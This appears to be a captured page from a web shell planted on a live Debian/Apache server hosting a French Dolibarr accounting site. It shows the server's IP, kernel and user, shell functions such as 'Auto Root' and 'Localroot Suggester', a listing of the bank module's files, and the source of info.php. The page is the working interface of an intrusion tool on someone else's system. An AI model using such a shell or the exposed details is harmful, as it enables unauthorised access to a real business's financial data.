Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.0
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
gmd.bdcloud.fr /
compta /
bank /
Delete
Unzip
Name
Size
Permission
Date
Action
class
[ DIR ]
drwxr-xr-x
2025-11-08 11:16
various_payment
[ DIR ]
drwxr-xr-x
2025-11-08 11:16
account_statement_document.php
7.11
KB
-rw-r--r--
2022-09-27 16:06
annuel.php
14.63
KB
-rw-r--r--
2022-09-27 16:06
bankentries_list.php
69.9
KB
-rw-r--r--
2022-09-27 16:06
bilan.php
2.63
KB
-rw-r--r--
2022-09-27 16:06
budget.php
3.47
KB
-rw-r--r--
2022-09-27 16:06
card.php
41.79
KB
-rw-r--r--
2022-09-27 16:06
categ.php
5.27
KB
-rw-r--r--
2022-09-27 16:06
document.php
4.6
KB
-rw-r--r--
2022-09-27 16:06
graph.php
26.43
KB
-rw-r--r--
2022-09-27 16:06
info.php
2.54
KB
-rw-r--r--
2022-09-27 16:06
line.php
25.33
KB
-rw-r--r--
2022-09-27 16:06
list.php
27.08
KB
-rw-r--r--
2022-09-27 16:06
releve.php
26.3
KB
-rw-r--r--
2022-09-27 16:06
transfer.php
9.98
KB
-rw-r--r--
2022-09-27 16:06
treso.php
12.03
KB
-rw-r--r--
2022-09-27 16:06
Save
Rename
<?php /* Copyright (C) 2005-2010 Laurent Destailleur <eldy@users.sourceforge.net> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ /** * \file htdocs/compta/bank/info.php * \ingroup banque * \brief Onglet info d'une ecriture bancaire */ require '../../main.inc.php'; require_once DOL_DOCUMENT_ROOT.'/core/lib/functions2.lib.php'; require_once DOL_DOCUMENT_ROOT.'/compta/paiement/class/paiement.class.php'; require_once DOL_DOCUMENT_ROOT.'/compta/bank/class/account.class.php'; // Load translation files required by the page $langs->loadLangs(array('banks', 'categories', 'companies')); $id = GETPOST("rowid", 'int'); $accountid = (GETPOST('id', 'int') ? GETPOST('id', 'int') : GETPOST('account', 'int')); $ref = GETPOST('ref', 'alpha'); // Security check $fieldvalue = (!empty($id) ? $id : (!empty($ref) ? $ref : '')); $fieldtype = (!empty($ref) ? 'ref' : 'rowid'); if ($user->socid) { $socid = $user->socid; } $result = restrictedArea($user, 'banque', $accountid, 'bank_account'); if (empty($user->rights->banque->lire) && empty($user->rights->banque->consolidate)) { accessforbidden(); } /* * View */ llxHeader(); $object = new AccountLine($db); $object->fetch($id); $object->info($id); $h = 0; $head[$h][0] = DOL_URL_ROOT.'/compta/bank/line.php?rowid='.$id; $head[$h][1] = $langs->trans("BankTransaction"); $h++; $head[$h][0] = DOL_URL_ROOT.'/compta/bank/info.php?rowid='.$id; $head[$h][1] = $langs->trans("Info"); $hselected = $h; $h++; print dol_get_fiche_head($head, $hselected, $langs->trans("LineRecord"), -1, 'accountline'); $linkback = '<a href="'.DOL_URL_ROOT.'/compta/bank/bankentries_list.php?restore_lastsearch_values=1">'.$langs->trans("BackToList").'</a>'; dol_banner_tab($object, 'rowid', $linkback); print '<div class="underbanner clearboth"></div>'; print '<br>'; print '<table width="100%"><tr><td>'; dol_print_object_info($object); print '</td></tr></table>'; print '</div>'; // End of page llxFooter(); $db->close();